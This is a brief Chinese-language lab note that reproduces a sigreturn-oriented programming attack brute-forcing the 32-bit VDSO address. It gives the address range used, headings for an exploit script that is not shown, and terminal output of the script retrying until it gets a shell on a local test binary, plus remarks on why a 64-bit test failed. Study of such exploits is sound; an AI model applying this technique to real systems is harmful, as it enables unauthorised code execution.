1 概述
https://www.anquanke.com/post/id/85810
Sigreturn Oriented Programming攻击简介
这篇文章描述了32位vdso的爆破
本文是对它的复现和笔记。
2 32位VDSO的爆破
2.1 原理
32位的VDSO只有1个字节是随机的
vdso_range = range(0xf7700000, 0xf7800000, 0x1000)
2.2 程序
Makefile
测试环境:Ubuntu-16.04
2.3 EXP
2.4 测试结果
millionsky@ubuntu-16:~/tmp/srop_test3$ python srop32_crack_vdso.py
nTry 218
[+] Starting local process './srop_test': pid 26870
vdso_addr: 0xf7773000
[*] Process './srop_test' stopped with exit code -11 (SIGSEGV) (pid 26870)
nTry 219
[+] Starting local process './srop_test': pid 26873
vdso_addr: 0xf7742000
[*] Switching to interactive mode
$ whoami
millionsky
$ ls
core srop32_crack_vdso.py srop_test
makefile srop32_crack_vdso.tar.gz srop_test.c
$ exit
[*] Got EOF while reading in interactive
$
[*] Process './srop_test' stopped with exit code 0 (pid 26873)
[*] Got EOF while sending in interactive
2.5 测试中的问题
在Ubuntu 16.04 64上测试32位程序失败(已经调整了/bin/sh,bss,sigreturn_offset,syscall_offset)
l 失败的原因在于main函数的栈溢出不好搞。Main开始对ESP进行了取整,EBP-4的地方存储的是addr_of_argc。Main的结尾,ESP是通过EBP-4处保存的addr_of_argc进行恢复的;
将漏洞代码放入单独的函数中时,爆破成功
3 参考文章
1. Sigreturn Oriented Programming攻击简介。https://www.anquanke.com/post/id/85810